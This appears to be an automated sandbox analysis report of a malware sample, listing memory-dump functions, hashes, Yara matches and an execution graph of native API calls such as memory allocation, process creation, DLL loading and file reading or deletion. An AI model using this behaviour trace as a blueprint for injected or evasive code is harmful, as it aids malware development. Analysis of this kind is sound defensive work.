                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: L$S$\$a$c$e$l
                                                                                  • API String ID: 0-3322591375
                                                                                  • Opcode ID: fe5db8e23601e4186cb554101e2d9db36515e5ba38ae3d582012475074512604
                                                                                  • Instruction ID: ce7d58abde2b6ae386169404e4d22798403feab92d2fb93714895f2a75df6d35
                                                                                  • Opcode Fuzzy Hash: fe5db8e23601e4186cb554101e2d9db36515e5ba38ae3d582012475074512604
                                                                                  • Instruction Fuzzy Hash: D441A7B2C14218AECF50DF99DC88BEEB7F9EF48300F01465AD909A7240EB7156458FA0
                                                                                  Function 027E1A88 Relevance: 7.6, Strings: 6, Instructions: 122COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (HD$(HD$FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                  • API String ID: 0-2079321013
                                                                                  • Opcode ID: 6f9d26bba0c40047bb727c5965690cfdff11a2aa1a96a300ae123d5619025ecd
                                                                                  • Instruction ID: 43590aaca965a7097be7790c1af9bcb0738c5d09636cf655a799cf0f2f04fb0a
                                                                                  • Opcode Fuzzy Hash: 6f9d26bba0c40047bb727c5965690cfdff11a2aa1a96a300ae123d5619025ecd
                                                                                  • Instruction Fuzzy Hash: 3C4173719551987EEB02EB90CC45FEF777DAF55710F404548FA047A280E7746A018BB6
                                                                                  Function 027E1F34 Relevance: 6.5, Strings: 5, Instructions: 201COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $i$l$o$u
                                                                                  • API String ID: 0-2051669658
                                                                                  • Opcode ID: db87521331f17f9da3a909a6d235482b4134c0113c60fafdf354c847a132f476
                                                                                  • Instruction ID: ed4fdd14d1268c22ba484a8e114e990e9d58935c359b4269845c257bd26ea8c7
                                                                                  • Opcode Fuzzy Hash: db87521331f17f9da3a909a6d235482b4134c0113c60fafdf354c847a132f476
                                                                                  • Instruction Fuzzy Hash: 30613FB2900304AFDB25DBA4CC84FEFB7FDAB88714F104559E61AA7240E775AB45CB60
                                                                                  Function 027E1F38 Relevance: 6.4, Strings: 5, Instructions: 126COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $i$l$o$u
                                                                                  • API String ID: 0-2051669658
                                                                                  • Opcode ID: f20e4d6824bdf9b661ae3668a5a38a0b3c596d33dd4645c3c629ee493e264c21
                                                                                  • Instruction ID: 4541f1dcd957edec48cd95f062d34515b5bfb184d0d2b0bb8152cfb847adb9f2
                                                                                  • Opcode Fuzzy Hash: f20e4d6824bdf9b661ae3668a5a38a0b3c596d33dd4645c3c629ee493e264c21
                                                                                  • Instruction Fuzzy Hash: 0D411DB1900308AFDB64DFA4CC84FEFBBFDAB48704F104559E619A7240D771AA45CB60
                                                                                  Function 027DDD68 Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 0$0$6$I$P
                                                                                  • API String ID: 0-1705191920
                                                                                  • Opcode ID: 6cd82b9dcd8db3bc8646130042d3e90716340b5b85d00330fa7dcf82057e2479
                                                                                  • Instruction ID: a19802fdc83cd9cdaca5b8f960d3d1cf8e502240de48c2832d9a9773adeaf64a
                                                                                  • Opcode Fuzzy Hash: 6cd82b9dcd8db3bc8646130042d3e90716340b5b85d00330fa7dcf82057e2479
                                                                                  • Instruction Fuzzy Hash: D4215EB1A14209BBEF11DFA4CC45BEF77B9EF05304F004189EA08A7241E776AA048BE5

                                                                                  Execution Graph

                                                                                  Execution Coverage:2.5%
                                                                                  Dynamic/Decrypted Code Coverage:4.1%
                                                                                  Signature Coverage:2.2%
                                                                                  Total number of Nodes:461
                                                                                  Total number of Limit Nodes:76
                                                                                  execution_graph 100644 1abbd0 100647 1cbac0 100644->100647 100646 1ad241 100650 1c9c50 100647->100650 100649 1cbaee 100649->100646 100651 1c9c7b 100650->100651 100652 1c9cdf 100650->100652 100651->100649 100653 1c9cf5 NtAllocateVirtualMemory 100652->100653 100653->100649 100244 1b2910 100245 1b2936 100244->100245 100250 1c9160 100245->100250 100249 1b295b 100251 1c917a 100250->100251 100259 4312c0a 100251->100259 100252 1b2946 100254 1c9b90 100252->100254 100255 1c9bbb 100254->100255 100256 1c9c19 100254->100256 100255->100249 100262 4312e80 LdrInitializeThunk 100256->100262 100257 1c9c4a 100257->100249 100260 4312c11 100259->100260 100261 4312c1f LdrInitializeThunk 100259->100261 100260->100252 100261->100252 100262->100257 100654 1bcc50 100656 1bcc79 100654->100656 100655 1bcd7d 100656->100655 100657 1bcd23 FindFirstFileW 100656->100657 100657->100655 100658 1bcd3e 100657->100658 100659 1bcd64 FindNextFileW 100658->100659 100659->100658 100660 1bcd76 FindClose 100659->100660 100660->100655 100263 1c9810 100264 1c98c1 100263->100264 100266 1c983f 100263->100266 100265 1c98d7 NtCreateFile 100264->100265 100267 1c9110 100268 1c912d 100267->100268 100271 4312df0 LdrInitializeThunk 100268->100271 100269 1c9155 100271->100269 100277 1c8f90 100278 1c901c 100277->100278 100280 1c8fbe 100277->100280 100282 4312ee0 LdrInitializeThunk 100278->100282 100279 1c904d 100282->100279 100661 1c66d0 100662 1c672a 100661->100662 100664 1c6737 100662->100664 100665 1c40e0 100662->100665 100666 1cbac0 NtAllocateVirtualMemory 100665->100666 100667 1c411e 100666->100667 100668 1b4bd0 LdrLoadDll 100667->100668 100670 1c422e 100667->100670 100671 1c4164 100668->100671 100669 1c41b0 Sleep 100669->100671 100670->100664 100671->100669 100671->100670 100283 1b148b 100284 1b149f 100283->100284 100285 1b1493 PostThreadMessageW 100283->100285 100285->100284 100286 1a9f00 100287 1a9f0f 100286->100287 100288 1a9f50 100287->100288 100289 1a9f3d CreateThread 100287->100289 100290 1b7400 100291 1b742a 100290->100291 100294 1b8590 100291->100294 100293 1b744e 100295 1b85ad 100294->100295 100301 1c9250 100295->100301 100297 1b85fd 100298 1b8604 100297->100298 100306 1c9330 100297->100306 100298->100293 100300 1b862d 100300->100293 100302 1c927b 100301->100302 100303 1c92e5 100301->100303 100302->100297 100311 4312f30 LdrInitializeThunk 100303->100311 100304 1c931e 100304->100297 100307 1c93da 100306->100307 100308 1c935e 100306->100308 100312 4312d10 LdrInitializeThunk 100307->100312 100308->100300 100309 1c941f 100309->100300 100311->100304 100312->100309 100313 1b7980 100314 1b7995 100313->100314 100316 1b79ef 100313->100316 100314->100316 100317 1bb8e0 100314->100317 100318 1bb906 100317->100318 100319 1bbb36 100318->100319 100344 1c9ee0 100318->100344 100319->100316 100321 1bb97c 100321->100319 100347 1ccd10 100321->100347 100323 1bb99b 100323->100319 100324 1bba6f 100323->100324 100325 1c9160 LdrInitializeThunk 100323->100325 100327 1b61a0 LdrInitializeThunk 100324->100327 100328 1bba8e 100324->100328 100326 1bb9fa 100325->100326 100326->100324 100332 1bba03 100326->100332 100327->100328 100333 1bbb1e 100328->100333 100360 1c8cd0 100328->100360 100329 1bba57 100356 1b8760 100329->100356 100331 1bba35 100375 1c4de0 LdrInitializeThunk 100331->100375 100332->100319 100332->100329 100332->100331 100353 1b61a0 100332->100353 100337 1b8760 LdrInitializeThunk 100333->100337 100340 1bbb2c 100337->100340 100339 1bbaf5 100365 1c8d80 100339->100365 100340->100316 100342 1bbb0f 100370 1c8ee0 100342->100370 100345 1c9efd 100344->100345 100346 1c9f0e CreateProcessInternalW 100345->100346 100346->100321 100348 1ccc80 100347->100348 100352 1cccdd 100348->100352 100376 1cbc20 100348->100376 100350 1cccba 100379 1cbb40 100350->100379 100352->100323 100354 1c9330 LdrInitializeThunk 100353->100354 100355 1b61de 100354->100355 100355->100331 100357 1b8773 100356->100357 100388 1c9060 100357->100388 100359 1b879e 100359->100316 100361 1c8d4a 100360->100361 100362 1c8cfe 100360->100362 100394 43139b0 LdrInitializeThunk 100361->100394 100362->100339 100363 1c8d6f 100363->100339 100366 1c8dfa 100365->100366 100368 1c8dae 100365->100368 100395 4314340 LdrInitializeThunk 100366->100395 100367 1c8e1f 100367->100342 100368->100342 100371 1c8f57 100370->100371 100373 1c8f0b 100370->100373 100396 4312fb0 LdrInitializeThunk 100371->100396 100372 1c8f7c 100372->100333 100373->100333 100375->100329 100382 1c9e00 100376->100382 100378 1cbc3b 100378->100350 100385 1c9e50 100379->100385 100381 1cbb59 100381->100352 100383 1c9e1a 100382->100383 100384 1c9e2b RtlAllocateHeap 100383->100384 100384->100378 100386 1c9e6a 100385->100386 100387 1c9e7b RtlFreeHeap 100386->100387 100387->100381 100389 1c90db 100388->100389 100391 1c908e 100388->100391 100393 4312dd0 LdrInitializeThunk 100389->100393 100390 1c9100 100390->100359 100391->100359 100393->100390 100394->100363 100395->100367 100396->100372 100397 1c2180 100398 1c2199 100397->100398 100399 1c21e1 100398->100399 100402 1c2221 100398->100402 100404 1c2226 100398->100404 100400 1cbb40 RtlFreeHeap 100399->100400 100401 1c21ee 100400->100401 100403 1cbb40 RtlFreeHeap 100402->100403 100403->100404 100674 1ccc40 100675 1cbb40 RtlFreeHeap 100674->100675 100676 1ccc55 100675->100676 100405 1b8e84 100406 1b8e94 100405->100406 100407 1b8e41 100406->100407 100409 1b7720 100406->100409 100410 1b7736 100409->100410 100412 1b776f 100409->100412 100410->100412 100413 1b7590 LdrLoadDll 100410->100413 100412->100407 100413->100412 100677 1ba27a 100678 1ba27d 100677->100678 100679 1ba290 100678->100679 100680 1cbb40 RtlFreeHeap 100678->100680 100680->100679 100681 4312ad0 LdrInitializeThunk 100682 1b3773 100687 1b83e0 100682->100687 100685 1b379f 100686 1c9b00 NtClose 100686->100685 100688 1b83fa 100687->100688 100692 1b3783 100687->100692 100693 1c9200 100688->100693 100691 1c9b00 NtClose 100691->100692 100692->100685 100692->100686 100694 1c921a 100693->100694 100697 43135c0 LdrInitializeThunk 100694->100697 100695 1b84ca 100695->100691 100697->100695 100414 1bfeb0 100415 1bff14 100414->100415 100443 1b6930 100415->100443 100417 1c004e 100418 1c0047 100418->100417 100450 1b6a40 100418->100450 100420 1c01f3 100421 1c00ca 100421->100420 100422 1c0202 100421->100422 100454 1bfc90 100421->100454 100423 1c9b00 NtClose 100422->100423 100425 1c020c 100423->100425 100426 1c0106 100426->100422 100427 1c0111 100426->100427 100428 1cbc20 RtlAllocateHeap 100427->100428 100429 1c013a 100428->100429 100430 1c0159 100429->100430 100431 1c0143 100429->100431 100463 1bfb80 CoInitialize 100430->100463 100432 1c9b00 NtClose 100431->100432 100434 1c014d 100432->100434 100435 1c0167 100466 1c95e0 100435->100466 100437 1c01e2 100470 1c9b00 100437->100470 100439 1c01ec 100441 1cbb40 RtlFreeHeap 100439->100441 100440 1c0185 100440->100437 100442 1c95e0 LdrInitializeThunk 100440->100442 100441->100420 100442->100440 100444 1b6963 100443->100444 100445 1b6984 100444->100445 100473 1c9680 100444->100473 100445->100418 100447 1b69a7 100447->100445 100448 1c9b00 NtClose 100447->100448 100449 1b6a29 100448->100449 100449->100418 100451 1b6a65 100450->100451 100478 1c9480 100451->100478 100455 1bfcac 100454->100455 100483 1b4bd0 100455->100483 100457 1bfcd3 100457->100426 100458 1bfcca 100458->100457 100459 1b4bd0 LdrLoadDll 100458->100459 100460 1bfd9e 100459->100460 100461 1b4bd0 LdrLoadDll 100460->100461 100462 1bfdf8 100460->100462 100461->100462 100462->100426 100465 1bfbe5 100463->100465 100464 1bfc7b CoUninitialize 100464->100435 100465->100464 100467 1c95fa 100466->100467 100487 4312ba0 LdrInitializeThunk 100467->100487 100468 1c962a 100468->100440 100471 1c9b1a 100470->100471 100472 1c9b2b NtClose 100471->100472 100472->100439 100474 1c969a 100473->100474 100477 4312ca0 LdrInitializeThunk 100474->100477 100475 1c96c6 100475->100447 100477->100475 100479 1c949a 100478->100479 100482 4312c60 LdrInitializeThunk 100479->100482 100480 1b6ad9 100480->100421 100482->100480 100484 1b4bf4 100483->100484 100485 1b4c30 LdrLoadDll 100484->100485 100486 1b4bfb 100484->100486 100485->100486 100486->100458 100487->100468 100488 1bb3b0 100493 1bb0c0 100488->100493 100490 1bb3bd 100509 1bad40 100490->100509 100492 1bb3d9 100494 1bb0e5 100493->100494 100521 1b89d0 100494->100521 100497 1bb233 100497->100490 100499 1bb24a 100499->100490 100501 1bb241 100501->100499 100504 1bb337 100501->100504 100540 1c54b0 100501->100540 100545 1ba790 100501->100545 100503 1c54b0 GetFileAttributesW 100503->100504 100504->100503 100505 1bb39a 100504->100505 100554 1bab00 100504->100554 100507 1cbb40 RtlFreeHeap 100505->100507 100508 1bb3a1 100507->100508 100508->100490 100510 1bad53 100509->100510 100518 1bad5e 100509->100518 100511 1cbc20 RtlAllocateHeap 100510->100511 100511->100518 100512 1bad7c 100512->100492 100513 1b89d0 GetFileAttributesW 100513->100518 100514 1bb092 100515 1bb0a8 100514->100515 100516 1cbb40 RtlFreeHeap 100514->100516 100515->100492 100516->100515 100517 1c54b0 GetFileAttributesW 100517->100518 100518->100512 100518->100513 100518->100514 100518->100517 100519 1ba790 RtlFreeHeap 100518->100519 100520 1bab00 RtlFreeHeap 100518->100520 100519->100518 100520->100518 100522 1b89eb 100521->100522 100523 1b89f8 GetFileAttributesW 100522->100523 100524 1b8a03 100522->100524 100523->100524 100524->100497 100525 1c39d0 100524->100525 100526 1c39de 100525->100526 100527 1c39e5 100525->100527 100526->100501 100528 1b4bd0 LdrLoadDll 100527->100528 100529 1c3a1a 100528->100529 100530 1c3a29 100529->100530 100558 1c3490 LdrLoadDll 100529->100558 100532 1cbc20 RtlAllocateHeap 100530->100532 100537 1c3bd4 100530->100537 100533 1c3a42 100532->100533 100534 1c3bca 100533->100534 100536 1c3a5e 100533->100536 100533->100537 100535 1cbb40 RtlFreeHeap 100534->100535 100534->100537 100535->100537 100536->100537 100538 1cbb40 RtlFreeHeap 100536->100538 100537->100501 100539 1c3bbe 100538->100539 100539->100501 100541 1c5514 100540->100541 100542 1c554b 100541->100542 100559 1b8a20 100541->100559 100542->100501 100544 1c552d 100544->100501 100546 1ba7b6 100545->100546 100563 1be1c0 100546->100563 100548 1ba828 100550 1ba9b0 100548->100550 100552 1ba846 100548->100552 100549 1ba995 100549->100501 100550->100549 100551 1ba650 RtlFreeHeap 100550->100551 100551->100550 100552->100549 100568 1ba650 100552->100568 100555 1bab26 100554->100555 100556 1be1c0 RtlFreeHeap 100555->100556 100557 1babad 100556->100557 100557->100504 100558->100530 100560 1b89eb 100559->100560 100561 1b89f8 GetFileAttributesW 100560->100561 100562 1b8a03 100560->100562 100561->100562 100562->100544 100565 1be1e4 100563->100565 100564 1be1f1 100564->100548 100565->100564 100566 1cbb40 RtlFreeHeap 100565->100566 100567 1be234 100566->100567 100567->100548 100569 1ba66d 100568->100569 100572 1be250 100569->100572 100571 1ba773 100571->100552 100573 1be274 100572->100573 100574 1be31e 100573->100574 100575 1cbb40 RtlFreeHeap 100573->100575 100574->100571 100575->100574 100586 1c07b0 100587 1c07cd 100586->100587 100588 1b4bd0 LdrLoadDll 100587->100588 100589 1c07eb 100588->100589 100698 1c9970 100699 1c999e 100698->100699 100700 1c9a14 100698->100700 100701 1c9a2a NtReadFile 100700->100701 100702 1c1df0 100703 1c1e0c 100702->100703 100704 1c1e48 100703->100704 100705 1c1e34 100703->100705 100706 1c9b00 NtClose 100704->100706 100707 1c9b00 NtClose 100705->100707 100708 1c1e51 100706->100708 100709 1c1e3d 100707->100709 100712 1cbc60 RtlAllocateHeap 100708->100712 100711 1c1e5c 100712->100711 100713 1b2de8 100714 1b2e08 100713->100714 100715 1b6930 2 API calls 100714->100715 100716 1b2e13 100715->100716 100717 1a9f60 100718 1aa288 100717->100718 100720 1aa769 100718->100720 100721 1cb7b0 100718->100721 100722 1cb7d6 100721->100722 100727 1a41a0 100722->100727 100724 1cb7e2 100725 1cb81b 100724->100725 100730 1c5c60 100724->100730 100725->100720 100729 1a41ad 100727->100729 100734 1b3880 100727->100734 100729->100724 100731 1c5cc2 100730->100731 100733 1c5ccf 100731->100733 100745 1b2060 100731->100745 100733->100725 100735 1b389a 100734->100735 100737 1b38b3 100735->100737 100738 1ca520 100735->100738 100737->100729 100740 1ca53a 100738->100740 100739 1ca569 100739->100737 100740->100739 100741 1c9160 LdrInitializeThunk 100740->100741 100742 1ca5c3 100741->100742 100743 1cbb40 RtlFreeHeap 100742->100743 100744 1ca5d9 100743->100744 100744->100737 100746 1b209b 100745->100746 100761 1b84f0 100746->100761 100748 1b20a3 100749 1b2380 100748->100749 100750 1cbc20 RtlAllocateHeap 100748->100750 100749->100733 100751 1b20b9 100750->100751 100752 1cbc20 RtlAllocateHeap 100751->100752 100753 1b20ca 100752->100753 100754 1cbc20 RtlAllocateHeap 100753->100754 100755 1b20db 100754->100755 100760 1b2178 100755->100760 100776 1b7090 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100755->100776 100757 1b4bd0 LdrLoadDll 100758 1b2332 100757->100758 100772 1c85a0 100758->100772 100760->100757 100762 1b851c 100761->100762 100763 1b83e0 2 API calls 100762->100763 100764 1b853f 100763->100764 100765 1b8549 100764->100765 100766 1b8561 100764->100766 100767 1b8554 100765->100767 100769 1c9b00 NtClose 100765->100769 100768 1b857d 100766->100768 100770 1c9b00 NtClose 100766->100770 100767->100748 100768->100748 100769->100767 100771 1b8573 100770->100771 100771->100748 100773 1c8602 100772->100773 100775 1c860f 100773->100775 100777 1b2390 100773->100777 100775->100749 100776->100760 100793 1b87c0 100777->100793 100779 1b28f3 100779->100775 100780 1b23b0 100780->100779 100797 1c17d0 100780->100797 100783 1b25c7 100785 1ccd10 2 API calls 100783->100785 100784 1b240e 100784->100779 100800 1ccbe0 100784->100800 100787 1b25dc 100785->100787 100786 1b8760 LdrInitializeThunk 100789 1b2629 100786->100789 100787->100789 100805 1b0eb0 100787->100805 100789->100779 100789->100786 100790 1b0eb0 LdrInitializeThunk 100789->100790 100790->100789 100791 1b2777 100791->100789 100792 1b8760 LdrInitializeThunk 100791->100792 100792->100791 100794 1b87cd 100793->100794 100795 1b87ee SetErrorMode 100794->100795 100796 1b87f5 100794->100796 100795->100796 100796->100780 100798 1cbac0 NtAllocateVirtualMemory 100797->100798 100799 1c17f1 100798->100799 100799->100784 100801 1ccbf6 100800->100801 100802 1ccbf0 100800->100802 100803 1cbc20 RtlAllocateHeap 100801->100803 100802->100783 100804 1ccc1c 100803->100804 100804->100783 100808 1c9d70 100805->100808 100809 1c9d8d 100808->100809 100812 4312c70 LdrInitializeThunk 100809->100812 100810 1b0ecf 100810->100791 100812->100810 100590 1b6220 100591 1b8760 LdrInitializeThunk 100590->100591 100592 1b6250 100590->100592 100591->100592 100594 1b627c 100592->100594 100595 1b86e0 100592->100595 100596 1b8724 100595->100596 100601 1b8745 100596->100601 100602 1c8e30 100596->100602 100598 1b8735 100599 1b8751 100598->100599 100600 1c9b00 NtClose 100598->100600 100599->100592 100600->100601 100601->100592 100603 1c8eaa 100602->100603 100604 1c8e5e 100602->100604 100607 4314650 LdrInitializeThunk 100603->100607 100604->100598 100605 1c8ecf 100605->100598 100607->100605 100608 1b77a0 100609 1b77b9 100608->100609 100617 1b780c 100608->100617 100611 1c9b00 NtClose 100609->100611 100609->100617 100610 1b7944 100612 1b77d4 100611->100612 100618 1b6bc0 NtClose LdrInitializeThunk LdrInitializeThunk 100612->100618 100614 1b791e 100614->100610 100620 1b6d90 NtClose LdrInitializeThunk LdrInitializeThunk 100614->100620 100617->100610 100619 1b6bc0 NtClose LdrInitializeThunk LdrInitializeThunk 100617->100619 100618->100617 100619->100614 100620->100610 100621 1c0220 100622 1c023f 100621->100622 100624 1c7b00 100621->100624 100625 1c7b65 100624->100625 100626 1c7b94 100625->100626 100629 1bdfc0 100625->100629 100626->100622 100628 1c7b76 100628->100622 100630 1bdfac 100629->100630 100632 1bdf30 100629->100632 100630->100628 100631 1c54b0 GetFileAttributesW 100631->100632 100632->100630 100632->100631 100633 1c60a0 100634 1c6105 100633->100634 100635 1c6140 100634->100635 100638 1c1aa0 100634->100638 100637 1c6122 100639 1c1ab7 100638->100639 100640 1c1a45 100638->100640 100641 1c9b00 NtClose 100640->100641 100642 1c1a8c 100641->100642 100642->100637 100813 1c9a60 100814 1c9ad1 100813->100814 100816 1c9a8b 100813->100816 100815 1c9ae7 NtDeleteFile 100814->100815

                                                                                  Executed Functions

                                                                                  Function 001A9F60 Relevance: 24.2, Strings: 19, Instructions: 448COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 165 1a9f60-1aa281 166 1aa288-1aa28f 165->166 167 1aa291-1aa2a7 166->167 168 1aa2b4-1aa2cd 166->168 170 1aa2a9-1aa2af 167->170 171 1aa2b2 167->171 168->168 169 1aa2cf-1aa2e0 168->169 172 1aa2f1-1aa2fd 169->172 170->171 171->166 173 1aa30e-1aa315 172->173 174 1aa2ff-1aa30c 172->174 175 1aa336-1aa340 173->175 176 1aa317-1aa334 173->176 174->172 178 1aa351-1aa35a 175->178 176->173 179 1aa378-1aa389 178->179 180 1aa35c-1aa368 178->180 183 1aa39a-1aa3a3 179->183 181 1aa36a-1aa370 180->181 182 1aa376 180->182 181->182 182->178 185 1aa3c7-1aa3d1 183->185 186 1aa3a5-1aa3b1 183->186 187 1aa409-1aa412 185->187 188 1aa3d3-1aa3ee 185->188 189 1aa3b8-1aa3ba 186->189 190 1aa3b3-1aa3b7 186->190 193 1aa437 187->193 194 1aa414-1aa435 187->194 191 1aa3f0-1aa3f4 188->191 192 1aa3f5-1aa3f7 188->192 195 1aa3bc-1aa3c2 189->195 196 1aa3c5 189->196 190->189 191->192 197 1aa3f9-1aa401 192->197 198 1aa407 192->198 199 1aa43e-1aa457 193->199 194->187 195->196 196->183 197->198 198->185 199->199 201 1aa459-1aa463 199->201 202 1aa474-1aa47d 201->202 203 1aa47f-1aa492 202->203 204 1aa494-1aa49b 202->204 203->202 206 1aa4cd-1aa4d7 204->206 207 1aa49d-1aa4cb 204->207 208 1aa4e8-1aa4f1 206->208 207->204 209 1aa502-1aa51b 208->209 210 1aa4f3-1aa500 208->210 209->209 212 1aa51d-1aa529 209->212 210->208 213 1aa52b-1aa546 212->213 214 1aa548-1aa551 212->214 213->212 215 1aa6e1-1aa6eb 214->215 216 1aa557-1aa55e 214->216 217 1aa6fc-1aa708 215->217 218 1aa588-1aa592 216->218 219 1aa560-1aa572 216->219 220 1aa70a-1aa71c 217->220 221 1aa71e-1aa725 217->221 224 1aa5a3-1aa5ac 218->224 222 1aa579-1aa57b 219->222 223 1aa574-1aa578 219->223 220->217 227 1aa72b-1aa732 221->227 228 1aa809-1aa813 221->228 230 1aa57d-1aa583 222->230 231 1aa586 222->231 223->222 225 1aa5ae-1aa5c1 224->225 226 1aa5c3-1aa5c6 224->226 225->224 233 1aa5cc-1aa5d3 226->233 234 1aa764 call 1cb7b0 227->234 235 1aa734-1aa762 227->235 230->231 231->216 236 1aa605-1aa614 233->236 237 1aa5d5-1aa603 233->237 241 1aa769-1aa773 234->241 235->227 239 1aa61b-1aa622 236->239 240 1aa616 236->240 237->233 242 1aa647-1aa651 239->242 243 1aa624-1aa63a 239->243 240->215 244 1aa784-1aa78d 241->244 249 1aa662-1aa66b 242->249 247 1aa63c-1aa642 243->247 248 1aa645 243->248 245 1aa78f-1aa79e 244->245 246 1aa7a0-1aa7a7 244->246 245->244 251 1aa7a9-1aa7d2 246->251 252 1aa7d4-1aa7de 246->252 247->248 248->239 253 1aa66d-1aa67f 249->253 254 1aa681-1aa68a 249->254 251->246 255 1aa7ef-1aa7f9 252->255 253->249 256 1aa68c-1aa6a4 254->256 257 1aa6a6-1aa6ac 254->257 255->228 260 1aa7fb-1aa807 255->260 256->254 259 1aa6b0-1aa6b4 257->259 261 1aa6dc 259->261 262 1aa6b6-1aa6da 259->262 260->255 261->214 262->259
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: d$&B$)$*#$1$:$:}$OV$Q$U$]$_$_-$_<$b*$e$i3$i:$v2
                                                                                  • API String ID: 0-3217503214
                                                                                  • Opcode ID: c49d169a659368fe71844be9ac865211b6baaaa35d2d0f69a42ed5262277164d
                                                                                  • Instruction ID: f65e272f77f579c5f4c891f5207e1bc6f271ae4ff2774d6f616308607a1a0558
                                                                                  • Opcode Fuzzy Hash: c49d169a659368fe71844be9ac865211b6baaaa35d2d0f69a42ed5262277164d
                                                                                  • Instruction Fuzzy Hash: 6632BFB4D05229CBEB68CF44C898BEDBBB1BF45308F6481D9D0096B281D7B95AC9CF45
                                                                                  Function 001BCC50 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 001BCD34
                                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 001BCD6F
                                                                                  • FindClose.KERNELBASE(?), ref: 001BCD7A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 3541575487-0
                                                                                  • Opcode ID: 4c97a8d3e1393ac865fc2644c4165fbf533cb2054b97f8bd2608cce92750d3fe
                                                                                  • Instruction ID: 3965b152b6b6f4bd098f2dcdc5497d513f2b1ec60072aef3aaa23914c672f6c4
                                                                                  • Opcode Fuzzy Hash: 4c97a8d3e1393ac865fc2644c4165fbf533cb2054b97f8bd2608cce92750d3fe
                                                                                  • Instruction Fuzzy Hash: AA317075A003487BDB20DFA4CC86FEF77BCAF55744F104159F909A6191DB70AA848BE0
                                                                                  Function 001C9810 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtCreateFile.NTDLL(?,?,59BA9130,?,?,?,?,?,?,?,?), ref: 001C9908
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 5135da323445ef3c3097e7e7741681ab41f732bdf2234858e608911eb240bd1a
                                                                                  • Instruction ID: 45a45d39075e7b72db331adb086c1a7d408cb12497a67af5a0e26cabe01dcf19
                                                                                  • Opcode Fuzzy Hash: 5135da323445ef3c3097e7e7741681ab41f732bdf2234858e608911eb240bd1a
                                                                                  • Instruction Fuzzy Hash: 5E31C2B5A01248AFDB54DF98D881EEFBBB9AF9C704F108109F908A7244D770A951CBA5
                                                                                  Function 001C9970 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtReadFile.NTDLL(?,?,59BA9130,?,?,?,?,?,?), ref: 001C9A53
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  • Opcode ID: fba5c8c8623f852feb632874af99dc9b5267436a6d353ff22b3e7c83f4994071
